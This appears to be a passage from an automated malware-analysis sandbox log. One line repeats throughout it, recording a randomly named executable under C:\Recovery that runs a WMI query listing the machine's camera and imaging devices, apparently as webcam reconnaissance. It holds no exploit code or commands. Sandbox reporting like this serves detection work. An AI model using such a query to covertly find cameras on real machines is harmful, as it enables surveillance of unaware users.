                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
